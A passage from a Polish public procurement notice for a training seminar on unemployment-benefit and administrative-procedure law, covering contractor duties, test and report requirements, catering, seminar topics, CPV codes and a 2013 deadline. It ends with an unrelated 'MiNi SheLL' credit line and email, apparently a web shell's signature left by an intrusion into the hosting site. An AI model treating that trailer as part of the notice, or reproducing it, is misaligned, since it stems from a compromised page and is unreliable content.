skrypt z prezentacją wraz z aktualnymi aktami prawnymi, jeśli ich posiadanie wymagane jest ze względu na treść szkolenia,w formie papierowej jak również w formie elektronicznej;
 materiały biurowe dla uczestników szkolenia: teczka, notes, długopis;
6.	Przekazanie uczestnikom listy obecności i nadzorowanie jej podpisania;
7.	Powielenie i rozdanie ankiet ewaluacyjnych,AIOS - arkuszy indywidualnej oceny szkolenia, przekazanych wykonawcy przez Zamawiającego do 4 dni roboczych przed szkoleniem poprzez pocztę elektroniczną; 
8.	Wydanie na zakończenie szkolenia zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia dla każdego uczestnika; 
9.	Opracowanie oraz przeprowadzenie wśród uczestników badania efektywności szkolenia za pomocą pre- i post-testów zawierających minimum 15 pytań. Pytania zawarte w testach powinny być ściśle związane z tematyką szkolenia.
10.	Przekazanie Zamawiającemu w ciągu 5 dni roboczych po przeprowadzeniu szkolenia:
- tabeli wyników pre- i post-testów. Analiza powinna zawierać zbiorcze zestawienie ocen w szczególności:
 poziom wiedzy uczestników z zakresu tematu szkolenia przed jego realizacją,
 poziom wiedzy uczestników z zakresu tematu szkolenia po jego realizacji.
Wzór dokumentu stanowiącego arkusz analizy wyników przekazany zostanie Zamawiającemu w ciągu 3 dni roboczych od momentu podpisania umowy, w celu ustalenia jego ostatecznej wersji;
kopii listy obecności uczestników szkolenia, potwierdzonej za zgodność z oryginałem;
kopii zaświadczeń, potwierdzonych za zgodność z oryginałem;
rejestru zaświadczeń potwierdzających ukończenie szkolenia;
arkuszy indywidualnej oceny szkolenia lub ocenę zbiorczą sporządzoną na podstawie tych arkuszy;
raportu ewaluacyjnego zawierającego pełną analizę ocen dokonanych przez uczestników - raport powinien być dokonany na podstawie ankiet ewaluacyjnych AIOS oraz powinien obejmować:
- stopień zrealizowania celu i założeń szkolenia,
- stopień wypełnienia warunków umowy,
- sposób organizacji szkolenia,
- współpracę pomiędzy wykonawcą a Zamawiającym. 
Jednocześnie raport powinien zawierać spostrzeżenia osoby prowadzącej szkolenie dotyczące:
zakresu z jakiego uczestnicy zadawali pytania, 
dyskusji jakie wywiązały się podczas szkolenia,
ewentualnych przyszłych potrzeb szkoleniowych związanych z tematem szkolenia, zgłaszanych podczas realizacji szkolenia;
11.	Zapewnienie poczęstunku:
1 całodzienny serwis kawowy serwowany w formie bufetu szwedzkiego, w ilości adekwatnej do ilości uczestników szkolenia, obejmujący: kawę,herbatę,wodę mineralną gazowaną i niegazowaną,dwa rodzaje soków owocowych,trzy rodzaje kruchych ciasteczek lub wypieków,cukier,cytrynę,śmietankę,mleczko do kawy.
1 posiłek typu lunch serwowany w formie bufetu szwedzkiego, w ilości adekwatnej do ilości uczestników szkolenia, obejmujący:dwa dania ciepłe,trzy rodzaje sałatek, zimną płytę z wędlinami i serami,pieczywo,wodę mineralną gazowaną i niegazowaną,dwa rodzaje soków owocowych,dwa rodzaje ciast. 
Wykonawca zamówienia zobowiązany jest do przekazania Zamawiającemu w terminie dwóch dni roboczych od daty podpisania umowy dotyczącej realizacji szkolenia 2 propozycji menu dla każdego lunchu oraz przerw kawowych.
Ostateczną liczbę posiłków, godziny ich podawania oraz menu Zamawiający określi na 4 dni robocze przed realizacją zamówienia. 
12.	Informowanie Zamawiającego o wszystkich utrudnieniach przy realizacji zamówienia w zakresie realizacji szkolenia..
II. Program seminarium szkoleniowego powinien obejmować następujące zagadnienia:

1.	Uznanie za osobę bezrobotną osoby posiadającej status członka w spółce prawa handlowego prezes zarządu, wiceprezes, członek zarządu, także likwidator;
2.	Ustalanie okresu uprawniającego do zasiłku w świetle art. 71 w sytuacji:
- równoczesnego wykonywania pracy w ramach umowy o pracę w niepełnym wymiarze czasu pracy wynagrodzenie niższe od najniższego wynagrodzenia i pracy w ramach umowy zlecenie,
równoczesnego wykonywania pracy w ramach umów cywilnoprawnych umowy zlecenie, o dzieło i inne,
wykonywania tzw. wolnych zawodów,
wystąpienia   urlopu bezpłatnego w przypadku równoczesnego wykonywania  zatrudnienia w niepełnym wymiarze czasu pracy lub zbiegu zatrudnienia i umowy cywilnoprawnej;
3.	Rozpoznawanie spraw w przedmiocie przyznania dotacji na działalność gospodarczą lub sfinansowania kosztów studiów podyplomowych problemy związane z wydawaniem decyzji,  przy odmowie;
4.	Zbieg prawa do świadczeń z tytułu bezrobocia i z tytułu ubezpieczeń społecznych - art. 78 ust. 1 i 4   ustawy o promocji zatrudnienia  a wznowienie postępowania w świetle art. 145 § 1 pkt 5 lub 8 kpa;
5.	Badanie przesłanek - podstaw do umorzenia w całości lub części, rozłożenia na raty, odroczenia  nienależnie pobranego świadczenia;
6.	Przyznanie prawa do zasiłku a wykreślenie działalności gospodarczej w trakcie biegu 90-dniowego okresu jej zawieszenia art. 75 ust. 1 pkt 8;
7.	Skuteczne doręczenie decyzji osobie bez adresu zameldowania, bez adresu do korespondencji;
8.	Warunki skutecznego doręczenia decyzji w sytuacji sporządzenia przez doręczyciela adnotacji adresat wyprowadził się;
9.	Utrata statusu bezrobotnego w kontekście zmiany miejsca zameldowania - ustalenie daty utraty  ww. statusu w świetle art. 73 ust. 2a;
10.	Udzielanie pełnomocnictwa w postępowaniu administracyjnym zakres pełnomocnictwa, wypowiedzenie pełnomocnictwa;
11.	Podstawy zawieszenia postępowania w świetle orzecznictwa sądowoadministracyjnego  zawieszenie z urzędu i na wniosek;
12.	Sądowoadministracyjna  kontrola w sprawach innych niż decyzje i postanowienia dotyczące uprawnień lub obowiązków wynikających z przepisów prawa w odniesieniu do przepisów ustawy  o promocji zatrudnienia art. 3 §2 pkt 4 p.o.p.p.s.a.;
13.	Wstrzymanie wykonania decyzji w postępowaniu administracyjnym i sądowym;
Wykonanie niewykonanie wyroków sądu administracyjnego, skutki, konsekwencje itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com